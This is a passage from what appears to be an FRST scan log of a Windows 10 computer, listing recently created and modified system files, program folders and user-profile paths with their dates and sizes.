2016-09-29 15:13 - 2016-09-15 09:33 - 03753984 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll

2016-09-29 15:13 - 2016-09-15 09:33 - 01004032 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll

2016-09-29 15:13 - 2016-09-15 09:33 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll

2016-09-29 15:13 - 2016-09-15 09:33 - 00512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll

2016-09-29 15:13 - 2016-09-15 09:32 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll

2016-09-29 15:13 - 2016-09-15 09:32 - 00634368 _____ (Microsoft Corporation) C:\WINDOWS\system32\StructuredQuery.dll

2016-09-29 15:13 - 2016-09-15 09:31 - 01053184 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll

2016-09-29 15:13 - 2016-09-15 09:31 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe

2016-09-29 15:13 - 2016-09-15 09:30 - 01639424 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll

2016-09-29 15:13 - 2016-09-15 09:29 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll

2016-09-29 15:13 - 2016-09-15 09:29 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RelPost.exe

2016-09-29 15:13 - 2016-09-15 09:28 - 03288064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll

2016-09-29 15:13 - 2016-09-15 09:28 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll

2016-09-29 15:13 - 2016-09-15 09:28 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll

2016-09-29 15:13 - 2016-09-15 09:27 - 02860032 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll

2016-09-29 15:13 - 2016-09-15 09:27 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll

2016-09-29 15:13 - 2016-09-15 09:27 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll

2016-09-29 15:13 - 2016-09-15 09:26 - 00501248 _____ (Microsoft Corporation) C:\WINDOWS\system32\imapi2.dll

2016-09-29 15:13 - 2016-09-15 09:25 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll

2016-09-29 15:13 - 2016-09-15 09:25 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\BackgroundMediaPolicy.dll

2016-09-29 15:13 - 2016-09-15 09:23 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll

2016-09-29 15:13 - 2016-09-15 09:23 - 01361408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll

2016-09-29 15:13 - 2016-09-15 09:23 - 01020928 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll

2016-09-29 15:13 - 2016-09-15 09:23 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll

2016-09-29 15:13 - 2016-09-15 09:23 - 00347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll

2016-09-29 15:13 - 2016-09-15 09:22 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll

2016-09-29 15:13 - 2016-09-15 09:22 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll

2016-09-29 15:13 - 2016-09-15 09:22 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll

2016-09-29 15:13 - 2016-09-15 09:22 - 00770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll

2016-09-29 15:13 - 2016-09-15 09:22 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll

2016-09-29 15:13 - 2016-09-15 09:21 - 00971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll

2016-09-29 15:13 - 2016-09-15 09:20 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll

2016-09-29 15:13 - 2016-09-15 09:20 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl

2016-09-29 15:13 - 2016-09-15 09:20 - 01710080 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll

2016-09-29 15:13 - 2016-09-15 09:20 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll

2016-09-29 15:13 - 2016-09-15 09:19 - 03202048 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll

2016-09-29 15:13 - 2016-09-15 09:19 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll

2016-09-29 15:13 - 2016-09-15 09:18 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll

2016-09-29 15:13 - 2016-09-15 09:18 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll

2016-09-29 15:13 - 2016-09-15 09:17 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll

2016-09-29 15:13 - 2016-09-15 09:16 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe

2016-09-29 15:13 - 2016-08-05 20:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll

2016-09-29 15:13 - 2016-08-05 01:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.UXRes.dll

2016-09-29 15:12 - 2016-09-15 10:37 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll

2016-09-29 15:12 - 2016-09-15 10:37 - 00496872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll

2016-09-29 15:12 - 2016-09-15 10:29 - 00424640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2_32.dll

2016-09-29 15:12 - 2016-09-15 10:29 - 00169056 _____ (Microsoft Corporation) C:\WINDOWS\system32\skci.dll

2016-09-29 15:12 - 2016-09-15 10:29 - 00074080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpci.sys

2016-09-29 15:12 - 2016-09-15 10:27 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll

2016-09-29 15:12 - 2016-09-15 10:27 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys

2016-09-29 15:12 - 2016-09-15 10:25 - 00340320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll

2016-09-29 15:12 - 2016-09-15 10:25 - 00280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeunlock.exe

2016-09-29 15:12 - 2016-09-15 10:22 - 00433832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll

2016-09-29 15:12 - 2016-09-15 10:21 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll

2016-09-29 15:12 - 2016-09-15 10:18 - 06654616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll

2016-09-29 15:12 - 2016-09-15 10:15 - 00557408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys

2016-09-29 15:12 - 2016-09-15 10:15 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys

2016-09-29 15:12 - 2016-09-15 10:14 - 01415752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll

2016-09-29 15:12 - 2016-09-15 10:14 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi

2016-09-29 15:12 - 2016-09-15 10:14 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe

2016-09-29 15:12 - 2016-09-15 10:14 - 00435040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys

2016-09-29 15:12 - 2016-09-15 10:12 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll

2016-09-29 15:12 - 2016-09-15 10:11 - 01990640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll

2016-09-29 15:12 - 2016-09-15 10:11 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll

2016-09-29 15:12 - 2016-09-15 10:11 - 01066104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll

2016-09-29 15:12 - 2016-09-15 10:11 - 00862064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfreadwrite.dll

2016-09-29 15:12 - 2016-09-15 10:11 - 00725664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll

2016-09-29 15:12 - 2016-09-15 10:11 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll

2016-09-29 15:12 - 2016-09-15 10:08 - 05683712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll

2016-09-29 15:12 - 2016-09-15 10:07 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll

2016-09-29 15:12 - 2016-09-15 10:07 - 01418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll

2016-09-29 15:12 - 2016-09-15 10:07 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll

2016-09-29 15:12 - 2016-09-15 10:06 - 00372440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll

2016-09-29 15:12 - 2016-09-15 10:01 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll

2016-09-29 15:12 - 2016-09-15 09:59 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp

2016-09-29 15:12 - 2016-09-15 09:59 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll

2016-09-29 15:12 - 2016-09-15 09:58 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll

2016-09-29 15:12 - 2016-09-15 09:58 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll

2016-09-29 15:12 - 2016-09-15 09:58 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll

2016-09-29 15:12 - 2016-09-15 09:58 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll

2016-09-29 15:12 - 2016-09-15 09:57 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll

2016-09-29 15:12 - 2016-09-15 09:57 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll

2016-09-29 15:12 - 2016-09-15 09:57 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll

2016-09-29 15:12 - 2016-09-15 09:56 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll

2016-09-29 15:12 - 2016-09-15 09:56 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll

2016-09-29 15:12 - 2016-09-15 09:56 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll

2016-09-29 15:12 - 2016-09-15 09:56 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Core.dll

2016-09-29 15:12 - 2016-09-15 09:55 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll

2016-09-29 15:12 - 2016-09-15 09:55 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll

2016-09-29 15:12 - 2016-09-15 09:55 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll

2016-09-29 15:12 - 2016-09-15 09:55 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll

2016-09-29 15:12 - 2016-09-15 09:55 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupugc.exe

2016-09-29 15:12 - 2016-09-15 09:54 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll

2016-09-29 15:12 - 2016-09-15 09:54 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll

2016-09-29 15:12 - 2016-09-15 09:53 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll

2016-09-29 15:12 - 2016-09-15 09:52 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll

2016-09-29 15:12 - 2016-09-15 09:52 - 00445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprapi.dll

2016-09-29 15:12 - 2016-09-15 09:52 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe

2016-09-29 15:12 - 2016-09-15 09:51 - 00762368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll

2016-09-29 15:12 - 2016-09-15 09:50 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pwrshplugin.dll

2016-09-29 15:12 - 2016-09-15 09:49 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll

2016-09-29 15:12 - 2016-09-15 09:48 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll

2016-09-29 15:12 - 2016-09-15 09:46 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll

2016-09-29 15:12 - 2016-09-15 09:46 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll

2016-09-29 15:12 - 2016-09-15 09:46 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll

2016-09-29 15:12 - 2016-09-15 09:45 - 02749440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll

2016-09-29 15:12 - 2016-09-15 09:45 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.BackgroundMediaPlayer.dll

2016-09-29 15:12 - 2016-09-15 09:44 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll

2016-09-29 15:12 - 2016-09-15 09:44 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.MediaPlayer.dll

2016-09-29 15:12 - 2016-09-15 09:44 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll

2016-09-29 15:12 - 2016-09-15 09:43 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe

2016-09-29 15:12 - 2016-09-15 09:43 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll

2016-09-29 15:12 - 2016-09-15 09:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll

2016-09-29 15:12 - 2016-09-15 09:43 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll

2016-09-29 15:12 - 2016-09-15 09:43 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll

2016-09-29 15:12 - 2016-09-15 09:42 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BackgroundMediaPolicy.dll

2016-09-29 15:12 - 2016-09-15 09:41 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll

2016-09-29 15:12 - 2016-09-15 09:41 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll

2016-09-29 15:12 - 2016-09-15 09:41 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp

2016-09-29 15:12 - 2016-09-15 09:40 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll

2016-09-29 15:12 - 2016-09-15 09:40 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll

2016-09-29 15:12 - 2016-09-15 09:40 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll

2016-09-29 15:12 - 2016-09-15 09:40 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll

2016-09-29 15:12 - 2016-09-15 09:40 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll

2016-09-29 15:12 - 2016-09-15 09:40 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.SystemEventsBroker.dll

2016-09-29 15:12 - 2016-09-15 09:40 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll

2016-09-29 15:12 - 2016-09-15 09:39 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll

2016-09-29 15:12 - 2016-09-15 09:39 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll

2016-09-29 15:12 - 2016-09-15 09:39 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll

2016-09-29 15:12 - 2016-09-15 09:38 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe

2016-09-29 15:12 - 2016-09-15 09:38 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll

2016-09-29 15:12 - 2016-09-15 09:38 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmrdvcore.dll

2016-09-29 15:12 - 2016-09-15 09:38 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvcext.dll

2016-09-29 15:12 - 2016-09-15 09:38 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll

2016-09-29 15:12 - 2016-09-15 09:37 - 01507840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.FaceAnalysis.dll

2016-09-29 15:12 - 2016-09-15 09:37 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll

2016-09-29 15:12 - 2016-09-15 09:37 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll

2016-09-29 15:12 - 2016-09-15 09:37 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\biwinrt.dll

2016-09-29 15:12 - 2016-09-15 09:37 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll

2016-09-29 15:12 - 2016-09-15 09:36 - 00719360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys

2016-09-29 15:12 - 2016-09-15 09:36 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll

2016-09-29 15:12 - 2016-09-15 09:36 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll

2016-09-29 15:12 - 2016-09-15 09:36 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll

2016-09-29 15:12 - 2016-09-15 09:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll

2016-09-29 15:12 - 2016-09-15 09:36 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll

2016-09-29 15:12 - 2016-09-15 09:35 - 00645120 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll

2016-09-29 15:12 - 2016-09-15 09:35 - 00472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll

2016-09-29 15:12 - 2016-09-15 09:35 - 00432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll

2016-09-29 15:12 - 2016-09-15 09:35 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SessEnv.dll

2016-09-29 15:12 - 2016-09-15 09:35 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\rshx32.dll

2016-09-29 15:12 - 2016-09-15 09:34 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll

2016-09-29 15:12 - 2016-09-15 09:33 - 00966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbe.dll

2016-09-29 15:12 - 2016-09-15 09:33 - 00560128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll

2016-09-29 15:12 - 2016-09-15 09:31 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwrshplugin.dll

2016-09-29 15:12 - 2016-09-15 09:30 - 03776512 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll

2016-09-29 15:12 - 2016-09-15 09:30 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll

2016-09-29 15:12 - 2016-09-15 09:30 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys

2016-09-29 15:12 - 2016-09-15 09:30 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Energy.dll

2016-09-29 15:12 - 2016-09-15 09:29 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll

2016-09-29 15:12 - 2016-09-15 09:28 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll

2016-09-29 15:12 - 2016-09-15 09:27 - 00796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll

2016-09-29 15:12 - 2016-09-15 09:27 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAC3ENC.DLL

2016-09-29 15:12 - 2016-09-15 09:25 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll

2016-09-29 15:12 - 2016-09-15 09:25 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll

2016-09-29 15:12 - 2016-09-15 09:24 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe

2016-09-29 15:12 - 2016-09-15 09:24 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll

2016-09-29 15:12 - 2016-09-15 09:24 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll

2016-09-29 15:12 - 2016-09-15 09:24 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll

2016-09-29 15:12 - 2016-09-15 09:24 - 00139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll

2016-09-29 15:12 - 2016-09-15 09:23 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll

2016-09-29 15:12 - 2016-09-15 09:23 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll

2016-09-29 15:12 - 2016-09-15 09:22 - 00857600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll

2016-09-29 15:12 - 2016-09-15 09:20 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll

2016-09-29 15:12 - 2016-09-15 09:19 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll

2016-09-29 15:12 - 2016-09-15 09:17 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll

2016-09-29 15:12 - 2016-09-15 09:16 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll

2016-09-29 15:12 - 2016-09-15 09:16 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll

2016-09-29 15:12 - 2016-08-05 20:33 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smphost.dll

2016-09-29 15:03 - 2016-10-17 21:03 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\777

2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Captain Sim

2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Captain Sim

2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\Flight Simulator X Files

2016-09-26 05:41 - 2016-10-16 12:20 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\qBittorrent

2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\qBittorrent

2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent

2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\Program Files (x86)\qBittorrent

2016-09-25 21:56 - 2016-09-25 21:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Universal Extractor

2016-09-25 21:56 - 2016-09-25 21:56 - 00000000 ____D C:\Program Files (x86)\Universal Extractor

2016-09-25 20:48 - 2016-10-20 15:01 - 00000000 ____D C:\ProgramData\Gramblr

2016-09-25 20:48 - 2016-10-18 19:40 - 00001015 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gramblr.lnk

2016-09-25 20:48 - 2016-10-13 14:48 - 00000000 ____D C:\Program Files\Gramblr

2016-09-25 19:12 - 2016-09-25 19:12 - 00000040 ___SH C:\WINDOWS\cnerolf.bin

2016-09-25 09:49 - 2016-09-25 09:49 - 00334616 _____ (Microsoft Corporation) C:\WINDOWS\system32\concrt140.dll

2016-09-25 09:49 - 2016-09-25 09:49 - 00089328 _____ (Microsoft Corporation) C:\WINDOWS\system32\vcruntime140.dll

2016-09-25 09:49 - 2016-09-25 09:49 - 00085744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vcruntime140.dll

2016-09-25 09:46 - 2016-09-25 09:46 - 00639728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp140.dll

2016-09-25 09:46 - 2016-09-25 09:46 - 00244504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\concrt140.dll

2016-09-25 09:45 - 2016-09-25 09:45 - 00443632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp140.dll

2016-09-25 09:45 - 2016-09-25 09:45 - 00394496 _____ (Microsoft Corporation) C:\WINDOWS\system32\vccorlib140.dll

2016-09-25 09:45 - 2016-09-25 09:45 - 00271104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vccorlib140.dll

2016-09-24 15:27 - 2016-09-24 15:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CaptainSim 757-200 PRO

2016-09-24 15:27 - 2016-09-24 15:27 - 00000000 ____D C:\Program Files\Microsoft Games

2016-09-20 19:47 - 2016-09-20 19:47 - 00002507 _____ C:\Users\Kyle Aniel\Desktop\Safari.lnk

2016-09-20 19:41 - 2016-10-18 19:40 - 00000726 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 10 Upgrade Assistant.lnk

2016-09-20 19:41 - 2016-10-18 19:38 - 00000726 _____ C:\Users\banie_000\Desktop\Windows 10 Upgrade Assistant.lnk

2016-09-20 19:41 - 2016-09-20 19:41 - 00000000 ____D C:\Windows10Upgrade

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2016-10-20 14:59 - 2016-09-16 04:16 - 00000000 ____D C:\Users\banie_000

2016-10-20 14:57 - 2016-09-16 04:09 - 00000000 ____D C:\WINDOWS\system32\SleepStudy

2016-10-20 06:44 - 2015-02-18 13:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Verizon

2016-10-20 05:17 - 2016-08-13 13:16 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Spotify

2016-10-20 05:17 - 2014-11-02 17:43 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Adobe

2016-10-20 05:16 - 2016-08-13 13:17 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Spotify

2016-10-20 05:15 - 2016-09-16 04:12 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat

2016-10-20 05:15 - 2014-11-01 19:56 - 00000000 __SHD C:\Users\Kyle Aniel\IntelGraphicsProfiles

2016-10-20 05:14 - 2016-09-16 04:53 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT

2016-10-20 05:14 - 2016-08-13 16:35 - 00000000 ____D C:\ProgramData\boost_interprocess

